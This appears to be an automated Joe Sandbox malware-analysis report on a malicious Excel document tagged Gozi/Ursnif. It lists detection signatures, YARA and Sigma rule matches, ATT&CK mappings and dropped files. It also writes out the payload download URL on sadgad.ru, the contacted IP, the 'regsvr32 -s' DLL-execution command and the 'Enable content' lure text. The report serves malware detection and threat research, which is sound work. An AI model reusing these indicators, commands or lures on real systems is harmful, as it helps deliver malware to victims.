Loading ...

Play interactive tourEdit tour

Analysis Report document-1458063504.xls

Overview

General Information

Sample Name:document-1458063504.xls
Analysis ID:324315
MD5:81094e0ac247fac6db3dea774c51d885
SHA1:7fea7786c0b5ae000d81eb03fa1ca1587a9b878d
SHA256:dfbac751a1f71e4e4c92e9c88fdfd531ce6eec06e078046cf025cd0f049487bd
Tags:goziSilentBuilderursnifxls

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Sigma detected: Microsoft Office Product Spawning Windows Shell
Yara detected hidden Macro 4.0 in Excel
Document contains embedded VBA macros
IP address seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Yara signature match

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 1084 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1960 cmdline: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

SourceRuleDescriptionAuthorStrings
document-1458063504.xlsSUSP_Excel4Macro_AutoOpenDetects Excel4 macro use with auto open / closeJohn Lambert @JohnLaTwC
  • 0x0:$header_docf: D0 CF 11 E0
  • 0x4fea2:$s1: Excel
  • 0x50f1d:$s1: Excel
  • 0x389b:$Auto_Open: 18 00 17 00 20 00 00 01 07 00 00 00 00 00 00 00 00 00 00 01 3A
document-1458063504.xlsJoeSecurity_HiddenMacroYara detected hidden Macro 4.0 in ExcelJoe Security

    Sigma Overview

    System Summary:

    barindex
    Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
    Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis: Data: Command: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1084, ProcessCommandLine: regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll, ProcessId: 1960

    Signature Overview

    Click to jump to signature section

    Show All Signature Results

    AV Detection:

    barindex
    Multi AV Scanner detection for submitted fileShow sources
    Source: document-1458063504.xlsReversingLabs: Detection: 44%

    Software Vulnerabilities:

    barindex
    Document exploit detected (UrlDownloadToFile)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
    Document exploit detected (process start blacklist hit)Show sources
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exeJump to behavior
    Source: global trafficDNS query: name: sadgad.ru
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.110.50.130:80
    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 78.110.50.130:80
    Source: Joe Sandbox ViewIP Address: 78.110.50.130 78.110.50.130
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadgad.ruConnection: Keep-Alive
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
    Source: global trafficHTTP traffic detected: GET /ds/231120.gif HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: sadgad.ruConnection: Keep-Alive
    Source: unknownDNS traffic detected: queries for: sadgad.ru
    Source: document-1458063504.xlsString found in binary or memory: http://sadgad.ru/ds/231120.gif
    Source: regsvr32.exe, 00000003.00000002.2092732865.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll

    System Summary:

    barindex
    Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
    Source: Screenshot number: 4Screenshot OCR: Enable editing" to unlock the editing document downloaded from the internet.y 0Protected View This
    Source: Screenshot number: 4Screenshot OCR: Enable content" to perform Microsoft Word Decryption Core to start the decryption of the document.
    Source: Screenshot number: 8Screenshot OCR: Enable Content X I J15 " "," jR " A B C D E F G H I K L M N O P Q R S T Y 301 302 303 304
    Found Excel 4.0 Macro with suspicious formulasShow sources
    Source: document-1458063504.xlsInitial sample: CALL
    Source: document-1458063504.xlsInitial sample: CALL
    Source: document-1458063504.xlsInitial sample: CALL
    Source: document-1458063504.xlsInitial sample: CALL
    Source: document-1458063504.xlsInitial sample: EXEC
    Found obfuscated Excel 4.0 MacroShow sources
    Source: document-1458063504.xlsInitial sample: High usage of CHAR() function: 18
    Source: document-1458063504.xlsOLE indicator, VBA macros: true
    Source: document-1458063504.xls, type: SAMPLEMatched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
    Source: classification engineClassification label: mal80.expl.evad.winXLS@3/5@1/1
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\3CDE0000Jump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRD25B.tmpJump to behavior
    Source: document-1458063504.xlsOLE indicator, Workbook stream: true
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: document-1458063504.xlsReversingLabs: Detection: 44%
    Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dllJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
    Source: unknownProcess created: C:\Windows\System32\regsvr32.exe regsvr32 -s C:\giogti\mpomqr\fwpxeohi.dll
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: document-1458063504.xls, type: SAMPLE

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting21Path InterceptionProcess Injection1Regsvr321OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsMasquerading1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools1Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    document-1458063504.xls14%MetadefenderBrowse
    document-1458063504.xls45%ReversingLabsDocument-Word.Backdoor.Quakbot

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://servername/isapibackend.dll0%Avira URL Cloudsafe
    http://sadgad.ru/ds/231120.gif0%URL Reputationsafe
    http://sadgad.ru/ds/231120.gif0%URL Reputationsafe
    http://sadgad.ru/ds/231120.gif0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    sadgad.ru
    78.110.50.130
    truefalse
      unknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      http://sadgad.ru/ds/231120.giffalse
      • URL Reputation: safe
      • URL Reputation: safe
      • URL Reputation: safe
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2092732865.0000000001C70000.00000002.00000001.sdmpfalse
      • Avira URL Cloud: safe
      low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      78.110.50.130
      unknownRussian Federation
      31240HT-SYSTEMS-ASUplinksRUfalse

      General Information

      Joe Sandbox Version:31.0.0 Red Diamond
      Analysis ID:324315
      Start date:29.11.2020
      Start time:05:59:04
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 4m 25s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:document-1458063504.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:5
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal80.expl.evad.winXLS@3/5@1/1
      EGA Information:Failed
      HDC Information:Failed
      HCA Information:
      • Successful, ratio: 100%
      • Number of executed functions: 0
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe
      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/324315/sample/document-1458063504.xls

      Simulations

      Behavior and APIs

      No simulations

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      78.110.50.130document-1517556048.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1517556048.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1497803430.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1497803430.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1533244692.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1533244692.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1499387068.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1496127226.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1499387068.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1496127226.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1541016241.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1521193651.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1541016241.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1521193651.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1543772758.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1543772758.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1541567989.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1541567989.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1546427621.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif
      document-1546427621.xlsGet hashmaliciousBrowse
      • sadgad.ru/ds/231120.gif

      Domains

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      sadgad.rudocument-1517556048.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1517556048.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1497803430.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1497803430.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1533244692.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1533244692.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1499387068.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1496127226.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1499387068.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1496127226.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541016241.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1521193651.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541016241.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1521193651.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1543772758.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1543772758.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541567989.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541567989.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1546427621.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1546427621.xlsGet hashmaliciousBrowse
      • 78.110.50.130

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      HT-SYSTEMS-ASUplinksRUdocument-1517556048.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1517556048.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1497803430.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1497803430.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1533244692.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1533244692.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1499387068.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1496127226.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1499387068.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1496127226.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541016241.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1521193651.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541016241.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1521193651.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1543772758.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1543772758.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541567989.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1541567989.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1546427621.xlsGet hashmaliciousBrowse
      • 78.110.50.130
      document-1546427621.xlsGet hashmaliciousBrowse
      • 78.110.50.130

      JA3 Fingerprints

      No context

      Dropped Files

      No context

      Created / dropped Files

      C:\Users\user\AppData\Local\Temp\8ADE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:data
      Category:dropped
      Size (bytes):315356
      Entropy (8bit):7.985644087117707
      Encrypted:false
      SSDEEP:6144:6E9rFLPodmRqyAVYtlKsVLCyo7NtbcY7uLaG/9t7+MK:6iFPM8R3AsB+bjej/9cr
      MD5:B05A5CED32DA689E47CD66285A4C4CBE
      SHA1:29DBE4805E842FFA275342E1BE83D4036EC9F860
      SHA-256:5274C43580A7B62C7AE7899E16C048B3293DF17A233C70E16DE8FB0C3B59F01B
      SHA-512:F659C06B28C6CD5A2F749B9EFF80886C4B12A6D524647C1B91687B4236708C40C099AFEFCD4A8F3035A555037FC65A0CCA94932560F75452FCAAD8F973C45309
      Malicious:false
      Reputation:low
      Preview: .V.N.0..4..y;J\@B.QS....A.>..o..~.6..=.nH..4DTb..s......j.U..>HkjrV.H..[!MS...?.OR..`.......Z|.6..:...M.I...Ei.-h.*.....z."...:...z>.]RnM...8.b..V.Q..f..wN...z.^...sNI."..OF.DJ.ZI...G..Up...-@.r^.......@.AMg.....sz~..A..d.f.C..\Jh..?0.w....9t..8.^.(n......F.g..Kk..q....%l8.*'Vi..1l...4...(ed..t........K.d.....T#}.{.Lo.+........"...&.2=..2.=../.^*..,#..q3...._.fD0..p.9..).....M6'7.{...9Y....s.Ft9S...}........g.z...E....v..........rh....YM..tZHM[.8.M.O.........PK..........!.C.T.....e.......[Content_Types].xml ...(..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Sun Nov 29 12:59:41 2020, atime=Sun Nov 29 12:59:41 2020, length=8192, window=hide
      Category:dropped
      Size (bytes):867
      Entropy (8bit):4.457318515616183
      Encrypted:false
      SSDEEP:12:85QpSCLgXg/XAlCPCHaXgzB8IB/qHvX+Wnicvb+PbDtZ3YilMMEpxRljKhWMyTdK:85HU/XTwz6IMvYeqDv3qFMqrNru/
      MD5:BCF20F82B5D3000F0463109BD012B611
      SHA1:EFBB3D2911368ADE13954CC6A9143A219A3B74B6
      SHA-256:942946C5ABB3DBE65C637D00F0FFC6C2208AD4C81FD98831578F9D425CB8AAB7
      SHA-512:CDDDA335B0B5DFB6C267962161CB7656C3528B30F07A7BD595485158193B4666092A0764D2B5FFA39B1E19489A43B12AFE623E99F9583F61FEFD8306EC9C08D5
      Malicious:false
      Reputation:low
      Preview: L..................F...........7G..2w^.W...2w^.W.... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1.....}Quo..Desktop.d......QK.X}Quo*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\618321\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......618321..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\document-1458063504.LNK
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:12 2020, mtime=Sun Nov 29 12:59:41 2020, atime=Sun Nov 29 12:59:41 2020, length=338432, window=hide
      Category:dropped
      Size (bytes):4236
      Entropy (8bit):4.519484026793177
      Encrypted:false
      SSDEEP:96:82WM/XLInP1Qh22WM/XLInP1Qh22WM/XLInP1Qh22WM/XLInP1Q/:80IntQE0IntQE0IntQE0IntQ/
      MD5:F9B8E9B9F9944AE0C672CE2836D519DB
      SHA1:4770EEA1DD4584657A53D37A2792876B5319C689
      SHA-256:8C528CD35C7E583E38191674E3F68545DA0469B1A36934563598173211B5F175
      SHA-512:EB67C5B1BECB44B8EED654BE05F6A4B5A35BEED3B8A321B7F895D78FC51A02C931FB1F7524E5B838A49682CD1CAF0C9A9A5B389B8A7EF33380E300AB8948AF8D
      Malicious:false
      Reputation:low
      Preview: L..................F.... ........{..2w^.W.....g.W....*...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....x.2..,..}Qro .DOCUME~1.XLS..\.......Q.y.Q.y*...8.....................d.o.c.u.m.e.n.t.-.1.4.5.8.0.6.3.5.0.4...x.l.s.......................-...8...[............?J......C:\Users\..#...................\\618321\Users.user\Desktop\document-1458063504.xls.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.d.o.c.u.m.e.n.t.-.1.4.5.8.0.6.3.5.0.4...x.l.s.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......618321..........D_....3N.
      C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:ASCII text, with CRLF line terminators
      Category:modified
      Size (bytes):232
      Entropy (8bit):4.742131777612872
      Encrypted:false
      SSDEEP:6:dj6Y9LcPprFSELcPprF6Y9LcPprFSELcPprF6Y9LcPprFSELcPprF6Y9LcPprFy:dm5rErE5rErE5rErE5rc
      MD5:52643E844960B27CE826ABDB37B10812
      SHA1:EB5B514AE7ABF0C5A124D6E402FBC5DA9E8E7EAA
      SHA-256:B797879DEA1A6B8E2C598D314B771B129753F404880A265967A44B61E3061BEE
      SHA-512:FF85FEE822B18EE6EFE05450BEC43A76B568CD116FA19C120F068105810F2869E4DD8B21CD85EC8780627520D49C2D5D4843654C0D9A90F4D9C7E6B79B490A4F
      Malicious:false
      Reputation:low
      Preview: Desktop.LNK=0..[xls]..document-1458063504.LNK=0..document-1458063504.LNK=0..[xls]..document-1458063504.LNK=0..document-1458063504.LNK=0..[xls]..document-1458063504.LNK=0..document-1458063504.LNK=0..[xls]..document-1458063504.LNK=0..
      C:\Users\user\Desktop\3CDE0000
      Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      File Type:Applesoft BASIC program data, first line number 16
      Category:dropped
      Size (bytes):398297
      Entropy (8bit):7.195896551300459
      Encrypted:false
      SSDEEP:6144:KcKoSsxzNDZLDZjlbR868O8KiA4XkXOn2xEtjPOtioVjDGUU1qfDlavx+W+LIfds:Uizo8RnsIROnr6n75YwB
      MD5:C194928F19C16972E1ECD09712AEC882
      SHA1:031444160EDE1A9A27D5B32D33E0A84B9C6DCC36
      SHA-256:A7BBA109394DCF47944472A7AEE927671A2B7A73B973903039219ACB88468B3B
      SHA-512:F6F0D860F2D3A94DE7592C142D96AC10D414BF929A5375B92436745559C5D669B60F3D610C2450E7D0373B1161EE85C7245B5A4FA7EF9322DDE57CCCC076294B
      Malicious:false
